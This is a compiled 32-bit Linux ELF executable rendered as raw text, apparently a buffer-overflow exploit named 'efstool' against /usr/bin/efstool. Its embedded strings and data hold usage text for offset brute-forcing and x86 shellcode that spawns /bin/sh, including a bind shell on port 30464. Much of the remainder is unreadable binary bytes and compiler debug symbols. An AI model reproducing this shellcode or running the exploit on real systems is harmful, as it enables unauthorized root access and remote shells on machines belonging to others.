ELF@„4|64 (44€4€ĄĄōō€ō€€€ĄĄ“š¤¤‘¤‘Čȁ /lib/ld-linux.so.2GNU  qœƒ•"8¬ƒ/¼ƒ Ģƒp ܃%"jģƒÆXüƒÓ „2?„åD,„+IĊ‡ libc.so.6printfsystemmalloc__deregister_frame_infosetenvexitatoi_IO_stdin_used__libc_start_mainstrlen__register_frame_info__gmon_start__GLIBC_2.0ii–°’ ˆ’Œ’’”’˜’œ’ ’¤’ؒ ¬’ U‰åƒģčåč{čÖÉĆ’5€’’%„’’%ˆ’héą’’’’%Œ’h銒’’’%’h饒’’’%”’hé°’’’’%˜’h é ’’’’%œ’h(鐒’’’% ’h0递’’’%¤’h8ép’’’’%ؒh@é`’’’’%¬’hHéP’’’1ķ^‰įƒäšPTRh ŠhtƒQVhœˆč›’’’ō‰öU‰åSPč[Ć‹ƒ4…Ąt’Š‹]üÉƉöU‰åƒģ‹ …ŅuI‹‹…Ątt&B£’‹‹ …Éuźø܃…Ątƒģ h ‘č’’’ƒÄø£ ‰ģ]ƍvU‰åƒģ‰ģ]ƍ¶Uøœƒ‰åƒģ…Ątƒģh“’h ‘č{ž’’ƒÄ‰ģ]Ɛ“&U‰åƒģ‰ģ]ƍ¶U‰å‰ą]ƐU‰åƒģƒģ hąŠ豞’’ƒÄƒģ’uh‹螾’’ƒÄƒģ h@‹莾’’ƒÄƒģ h€‹č~ž’’ƒÄƒģ hĄ‹čnž’’ƒÄƒģ hŒč^ž’’ƒÄƒģ’uh ŒčKž’’ƒÄÉƉöU‰åƒģƒģ hąŠč1ž’’ƒÄƒģ’5č’hQŒčž’’ƒÄƒģ’5ä’hiŒčž’’ƒÄƒģ’5ģ’hŒčļż’’ƒÄƒģ hø 蟿’’ƒÄ‰Ą£Ų’”Ų’…Ąuƒģ h Œčæż’’ƒÄƒģ j’čĀż’’‰ö”Ų’£Ģ’”Ģ’£Ü’ĒŌ’‰ö=Ō’· ~ė"‰ö‹ܒ”ģ’‰ƒܒƒŌ’ėӍvĒŌ’=Ō’Ū~ė‰ö”Ō’Ų’ʐ’Ō’ėŚ‰öƒ=Š’uwƒģ h@čöü’’ƒÄ‰Ą‰ĀŃź”Ų’)ŠÜ£Ģ’ĒŌ’‰öƒģ h@čĆü’’ƒÄ‰Ą9Ō’r鐋Ģ’ŗ@”Ō’Šˆ’Ģ’’Ō’ė½ƒ=Š’uwƒģ h€čvü’’ƒÄ‰Ą‰ĀŃź”Ų’)ŠÜ£Ģ’ĒŌ’‰öƒģ h€čCü’’ƒÄ‰Ą9Ō’r限‹Ģ’ŗ€”Ō’Šˆ’Ģ’’Ō’ė½ƒģ h‘č’ū’’ƒÄ‰Ą‰ĀŃź”Ų’)ŠÜ£Ģ’ĒŌ’vƒģ h‘čĖū’’ƒÄ‰Ą9Ō’rė$‹Ģ’ŗ‘”Ō’Šˆ’Ģ’’Ō’ėĮ”Ų’· ʃģj’5Ų’hŹŒč6ū’’ƒÄƒģ hŠŒč6ū’’ƒÄƒģ hčŒčvū’’ƒÄÉƐU‰åƒģƒ},ƒģ ‹E ’0č“ü’’ƒÄƒģ hčGū’’ƒÄø鄉ö‹E ƒĄƒģ ’0čHū’’ƒÄ‰Ą‰Ąƒų’u0ƒ}*ƒģ ‹E ’0čEü’’ƒÄƒģ h@čłś’’ƒÄøé6‹E ƒĄƒģ ’0čüś’’ƒÄ‰Ą‰Ą£ä’č’ū’’£č’‹ä’”č’)Š£ģ’‹E ƒĄƒģ ’0čÄś’’ƒÄ‰Ą‰Ą£Š’ƒ=ä’’u8‹E ƒĄ ƒģ ’0蟶’’ƒÄ‰Ą‰Ą£ ‹E ƒĄƒģ ’0胜’’ƒÄ‰Ą‰Ą£$ƒ=Š’~ƒ=Š’ė+vƒģ ‹E ’0čoū’’ƒÄƒģ h€č#ś’’ƒÄøėcƒ=ä’’uO” £ä’”ä’;$~ė:”ä’‹č’)Ā‰Š£ģ’ƒģ h¹胳’’ƒÄč‡ū’’’ä’ėævčwū’’øÉƐU‰åSƒģ”l’»l’ƒų’tv¼'ƒė’Š‹ƒų’uōX[]ĆU‰åƒģ‰ģ]ƍ¶U‰åSRč[ĆŅvč׳’’‹]üÉĆ my first exploit - efstool - j0ker@daforest.org usage: %s os types are: 1. linux x86 *untested* 2. experimental x86 3. bind shell to port 30464 x86 *untested* use -1 offset for bruteforce usage: %s -1 stack pointer .. 0x%x offset ......... 0x%x return addr .... 0x%x !!! error: couldn't allocate memory !!! j0ker/usr/bin/efstool $j0ker !!! error: no offset specified !!! !!! error: no start/stop offset specified !!! !!! error: invalid operating system identification !!! clearx’ė^)ĄˆF‰F ‰v° ‡óKS Ķ€)Ą@Ķ€čŽ’’’/bin/sh1Ą°1ŪĶ€1Ą1Ū°'Ķ€…Ąxė^1ĄˆFPPV°;PĶ€čķ’’’/bin/shė1ė^1ĄˆF‰^‰F ° ‰óNV Ķ€čį’’’/bin/sh#AAAABBBB1Ą°Ķ€1Ą1Ū1É1Ņ°f³Q±Q±Q±Q $Ķ€³±1ÉQQQ€ĮwfQ±fQ $²RQP $‰Ā1Ą°fĶ€³SR $1Ą°f€ĆĶ€1ĄPPR $³°fĶ€‰Ć1É1Ą°?Ķ€A1Ą°?Ķ€A1Ą°?Ķ€1ŪShn/shh//bi‰ćT$1ÉQS $1Ą° Ķ€1Ą°Ķ€ tƒ Š(@‚p   |’P$ƒƒž’’oü‚’’’oš’’oą‚’’’’’’’’¤‘¢ƒ²ƒĀƒŅƒāƒņƒ„„"„2„¢ƒdd„dd„9<H€r€Œ€»€ó€0€€Ņ€ż€,€V€€™€“€Õ€€1€V€€€©‚Ć‚¢¢ ‚cV$‚ļ[L‚b‚y‚¢¢¢‚ŲĘ€Ē¢Ś€ ń€!€"€#3€%K€&a€1x€2€3§€4Ą€5Ų€6ń€8 €9"€;B€=X€>n€?„€@š€A±€BÉ€C߀Dö€E €F$€G;€HT€Ii€NĻ€Qē€R€S€T9€UU€Vm€X…€[Ÿ€^·€eĶ€hē€l €q €r5 €uP €vm €yˆ €z„ €}½ €€Ö €ƒń €„ €‡& €Š@ ‚Ė”t ‚Fœ €¢Ņ € €#V €Y €4u €<Ā €Cś €F€S©€Zē€^€Ł€lł€tM€yn€ö€†4€Œ¢¢‚ L€b€8¢w‚Š‚b‚¢œ‚¢É€K¢¢L€€#Ō‚ē‚5ĮLĀwĀŠ‚ĀœĀ¢Āų€×€€H8€Kg€L˜€UĖ€Z€^?€aw€bÆ€\€€ū€r€­¢¢–€5 €7!€89€9S€:¢m dd„init.c/usr/src/build/87998-i386/BUILD/glibc-2.2.5/csu/gcc2_compiled.int:t(0,1)=r(0,1);-2147483648;2147483647;char:t(0,2)=r(0,2);0;127;long int:t(0,3)=r(0,3);-2147483648;2147483647;unsigned int:t(0,4)=r(0,4);0000000000000;0037777777777;long unsigned int:t(0,5)=r(0,5);0000000000000;0037777777777;long long int:t(0,6)=@s64;r(0,6);01000000000000000000000;0777777777777777777777;long long unsigned int:t(0,7)=@s64;r(0,7);0000000000000;01777777777777777777777;short int:t(0,8)=@s16;r(0,8);-32768;32767;short unsigned int:t(0,9)=@s16;r(0,9);0;65535;signed char:t(0,10)=@s8;r(0,10);-128;127;unsigned char:t(0,11)=@s8;r(0,11);0;255;float:t(0,12)=r(0,1);4;0;double:t(0,13)=r(0,1);8;0;long double:t(0,14)=r(0,1);12;0;complex int:t(0,15)=s8real:(0,1),0,32;imag:(0,1),32,32;;complex float:t(0,16)=r(0,16);8;0;complex double:t(0,17)=r(0,17);16;0;complex long double:t(0,18)=r(0,18);24;0;__builtin_va_list:t(0,19)=*(0,20)=(0,20)../include/libc-symbols.h/usr/src/build/87998-i386/BUILD/glibc-2.2.5/build-i386-linux/config.h../sysdeps/gnu/_G_config.h../sysdeps/unix/sysv/linux/bits/types.h../include/features.h../include/sys/cdefs.h../misc/sys/cdefs.h/usr/lib/gcc-lib/i386-redhat-linux/2.96/include/stddef.hsize_t:t(8,1)=(0,4)__u_char:t(4,1)=(0,11)__u_short:t(4,2)=(0,9)__u_int:t(4,3)=(0,4)__u_long:t(4,4)=(0,5)__u_quad_t:t(4,5)=(0,7)__quad_t:t(4,6)=(0,6)__int8_t:t(4,7)=(0,10)__uint8_t:t(4,8)=(0,11)__int16_t:t(4,9)=(0,8)__uint16_t:t(4,10)=(0,9)__int32_t:t(4,11)=(0,1)__uint32_t:t(4,12)=(0,4)__int64_t:t(4,13)=(0,6)__uint64_t:t(4,14)=(0,7)__qaddr_t:t(4,15)=(4,16)=*(4,6)__dev_t:t(4,17)=(4,5)__uid_t:t(4,18)=(4,3)__gid_t:t(4,19)=(4,3)__ino_t:t(4,20)=(4,4)__mode_t:t(4,21)=(4,3)__nlink_t:t(4,22)=(4,3)__off_t:t(4,23)=(0,3)__loff_t:t(4,24)=(4,6)__pid_t:t(4,25)=(0,1)__ssize_t:t(4,26)=(0,1)__rlim_t:t(4,27)=(4,4)__rlim64_t:t(4,28)=(4,5)__id_t:t(4,29)=(4,3)__fsid_t:t(4,30)=(4,31)=s8__val:(4,32)=ar(4,33)=r(4,33);0000000000000;0037777777777;;0;1;(0,1),0,64;;__daddr_t:t(4,34)=(0,1)__caddr_t:t(4,35)=(4,36)=*(0,2)__time_t:t(4,37)=(0,3)__useconds_t:t(4,38)=(0,4)__suseconds_t:t(4,39)=(0,3)__swblk_t:t(4,40)=(0,3)__clock_t:t(4,41)=(0,3)__clockid_t:t(4,42)=(0,1)__timer_t:t(4,43)=(0,1)__key_t:t(4,44)=(0,1)__ipc_pid_t:t(4,45)=(0,9)__blksize_t:t(4,46)=(0,3)__blkcnt_t:t(4,47)=(0,3)__blkcnt64_t:t(4,48)=(4,6)__fsblkcnt_t:t(4,49)=(4,4)__fsblkcnt64_t:t(4,50)=(4,5)__fsfilcnt_t:t(4,51)=(4,4)__fsfilcnt64_t:t(4,52)=(4,5)__ino64_t:t(4,53)=(4,5)__off64_t:t(4,54)=(4,24)__t_scalar_t:t(4,55)=(0,3)__t_uscalar_t:t(4,56)=(0,5)__intptr_t:t(4,57)=(0,1)__socklen_t:t(4,58)=(0,4)../linuxthreads/sysdeps/pthread/bits/pthreadtypes.h../sysdeps/unix/sysv/linux/bits/sched.h__sched_param:T(10,1)=s4__sched_priority:(0,1),0,32;;_pthread_fastlock:T(9,1)=s8__status:(0,3),0,32;__spinlock:(0,1),32,32;;_pthread_descr:t(9,2)=(9,3)=*(9,4)=xs_pthread_descr_struct:__pthread_attr_s:T(9,5)=s36__detachstate:(0,1),0,32;__schedpolicy:(0,1),32,32;__schedparam:(10,1),64,32;__inheritsched:(0,1),96,32;__scope:(0,1),128,32;__guardsize:(8,1),160,32;__stackaddr_set:(0,1),192,32;__stackaddr:(0,19),224,32;__stacksize:(8,1),256,32;;pthread_attr_t:t(9,6)=(9,5)pthread_cond_t:t(9,7)=(9,8)=s12__c_lock:(9,1),0,64;__c_waiting:(9,2),64,32;;pthread_condattr_t:t(9,9)=(9,10)=s4__dummy:(0,1),0,32;;pthread_key_t:t(9,11)=(0,4)pthread_mutex_t:t(9,12)=(9,13)=s24__m_reserved:(0,1),0,32;__m_count:(0,1),32,32;__m_owner:(9,2),64,32;__m_kind:(0,1),96,32;__m_lock:(9,1),128,64;;pthread_mutexattr_t:t(9,14)=(9,15)=s4__mutexkind:(0,1),0,32;;pthread_once_t:t(9,16)=(0,1)_pthread_rwlock_t:T(9,17)=s32__rw_lock:(9,1),0,64;__rw_readers:(0,1),64,32;__rw_writer:(9,2),96,32;__rw_read_waiting:(9,2),128,32;__rw_write_waiting:(9,2),160,32;__rw_kind:(0,1),192,32;__rw_pshared:(0,1),224,32;;pthread_rwlock_t:t(9,18)=(9,17)pthread_rwlockattr_t:t(9,19)=(9,20)=s8__lockkind:(0,1),0,32;__pshared:(0,1),32,32;;pthread_spinlock_t:t(9,21)=(0,1)pthread_barrier_t:t(9,22)=(9,23)=s20__ba_lock:(9,1),0,64;__ba_required:(0,1),64,32;__ba_present:(0,1),96,32;__ba_waiting:(9,2),128,32;;pthread_barrierattr_t:t(9,24)=(9,25)=s4__pshared:(0,1),0,32;;pthread_t:t(9,26)=(0,5)wchar_t:t(11,1)=(0,3)wint_t:t(11,2)=(0,4)../include/wchar.h../wcsmbs/wchar.h../sysdeps/unix/sysv/linux/i386/bits/wchar.h__mbstate_t:t(13,1)=(13,2)=s8__count:(0,1),0,32;__value:(13,3)=u4__wch:(11,2),0,32;__wchb:(13,4)=ar(4,33);0;3;(0,2),0,32;;,32,32;;_G_fpos_t:t(3,1)=(3,2)=s12__pos:(4,23),0,32;__state:(13,1),32,64;;_G_fpos64_t:t(3,3)=(3,4)=s16__pos:(4,54),0,64;__state:(13,1),64,64;;../include/gconv.h../iconv/gconv.h :T(17,1)=e__GCONV_OK:0,__GCONV_NOCONV:1,__GCONV_NODB:2,__GCONV_NOMEM:3,__GCONV_EMPTY_INPUT:4,__GCONV_FULL_OUTPUT:5,__GCONV_ILLEGAL_INPUT:6,__GCONV_INCOMPLETE_INPUT:7,__GCONV_ILLEGAL_DESCRIPTOR:8,__GCONV_INTERNAL_ERROR:9,; :T(17,2)=e__GCONV_IS_LAST:1,__GCONV_IGNORE_ERRORS:2,;__gconv_fct:t(17,3)=(17,4)=*(17,5)=f(0,1)__gconv_init_fct:t(17,6)=(17,7)=*(17,8)=f(0,1)__gconv_end_fct:t(17,9)=(17,10)=*(17,11)=f(0,20)__gconv_trans_fct:t(17,12)=(17,13)=*(17,14)=f(0,1)__gconv_trans_context_fct:t(17,15)=(17,16)=*(17,17)=f(0,1)__gconv_trans_query_fct:t(17,18)=(17,19)=*(17,20)=f(0,1)__gconv_trans_init_fct:t(17,21)=(17,22)=*(17,23)=f(0,1)__gconv_trans_end_fct:t(17,24)=(17,25)=*(17,26)=f(0,20)__gconv_trans_data:T(17,27)=s20__trans_fct:(17,12),0,32;__trans_context_fct:(17,15),32,32;__trans_end_fct:(17,24),64,32;__data:(0,19),96,32;__next:(17,28)=*(17,27),128,32;;__gconv_step:T(17,29)=s56__shlib_handle:(17,30)=*(17,31)=xs__gconv_loaded_object:,0,32;__modname:(17,32)=*(0,2),32,32;__counter:(0,1),64,32;__from_name:(4,36),96,32;__to_name:(4,36),128,32;__fct:(17,3),160,32;__init_fct:(17,6),192,32;__end_fct:(17,9),224,32;__min_needed_from:(0,1),256,32;__max_needed_from:(0,1),288,32;__min_needed_to:(0,1),320,32;__max_needed_to:(0,1),352,32;__stateful:(0,1),384,32;__data:(0,19),416,32;;__gconv_step_data:T(17,33)=s36__outbuf:(17,34)=*(0,11),0,32;__outbufend:(17,34),32,32;__flags:(0,1),64,32;__invocation_counter:(0,1),96,32;__internal_use:(0,1),128,32;__statep:(17,35)=*(13,1),160,32;__state:(13,1),192,64;__trans:(17,28),256,32;;__gconv_info:T(17,36)=s8__nsteps:(8,1),0,32;__steps:(17,37)=*(17,29),32,32;__data:(17,38)=ar(4,33);0;-1;(17,33),64,0;;__gconv_t:t(17,39)=(17,40)=*(17,36)_G_iconv_t:t(3,5)=(3,6)=u44__cd:(17,36),0,64;__combined:(3,7)=s44__cd:(17,36),0,64;__data:(17,33),64,288;;,0,352;;_G_int16_t:t(3,8)=(0,8)_G_int32_t:t(3,9)=(0,1)_G_uint16_t:t(3,10)=(0,9)_G_uint32_t:t(3,11)=(0,4)_IO_stdin_used:G(0,1)GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.3 2.96-110)GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.3 2.96-110)GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.3 2.96-110)GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.3 2.96-110)GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.3 2.96-110)GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.3 2.96-110)01.0101.0101.0101.0101.0101.01.symtab.strtab.shstrtab.interp.note.ABI-tag.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.data.eh_frame.dynamic.ctors.dtors.got.bss.stab.stabstr.comment.noteō€ō# 1((H7 ppŠ?@‚@ G’’’oą‚ąTž’’oü‚ü c ƒl $ƒ$P utƒtpŒƒŒ°{@„@` Š  ‡ĄŠĄ    • ‘ Ÿ¤‘¤ČØl’lÆt’t¶|’|8»“’“<Ą“¤ ĘXƒĻŪ3JŲ%5x5Ž;0: 4Ańō€(p@‚ą‚ü‚ƒ$ƒ tƒ Œƒ @„  ŠĄŠ ‘¤‘l’t’|’“’ń’ń’d„ "d„ 2ń’„ =At’O [„ q ‘„š„ “’˜… ¤0… Ɛ½l’2ń’`Š Ė`Š įp’¤Š Æ ‘īx’ū ‘ń’ Š ń’@… €j)¤‘2œƒ•"SH…~ YĄŠ`ȅÓ j¬ƒ/|Ģ’€¼ƒ ’tƒ ˜ĢƒpŖ܃%"ĶŠ’ŠŌ’Ņ ×@„ ŽŲ’åģƒÆ÷ܒ“’ń’ œˆ¼ üƒÓ.‘8 C „2U Š[@… ^ą’dä’k„å{,„+‹“’ń’’|’Øš’ń’­č’±@,¼ĊĖģ’ĻÜ$ā init.cinitfini.cgcc2_compiled.call_gmon_startcrtstuff.cp.0__DTOR_LIST__completed.1__do_global_dtors_aux__EH_FRAME_BEGIN__fini_dummyobject.2frame_dummyinit_dummyforce_to_data__CTOR_LIST____do_global_ctors_aux__CTOR_END____DTOR_END____FRAME_END__ohMy-another-efs.cexperimental_DYNAMIC__register_frame_info@@GLIBC_2.0usage_fp_hwdoExploitsetenv@@GLIBC_2.0ptrsystem@@GLIBC_2.0_initmalloc@@GLIBC_2.0__deregister_frame_info@@GLIBC_2.0osisoff_startbufferstrlen@@GLIBC_2.0addr_ptr__bss_startmain__libc_start_main@@GLIBC_2.0bindshelldata_startprintf@@GLIBC_2.0_finisposptroffsetexit@@GLIBC_2.0atoi@@GLIBC_2.0_edata_GLOBAL_OFFSET_TABLE__endesplunixshell_IO_stdin_usedret__data_startstoff__gmon_start__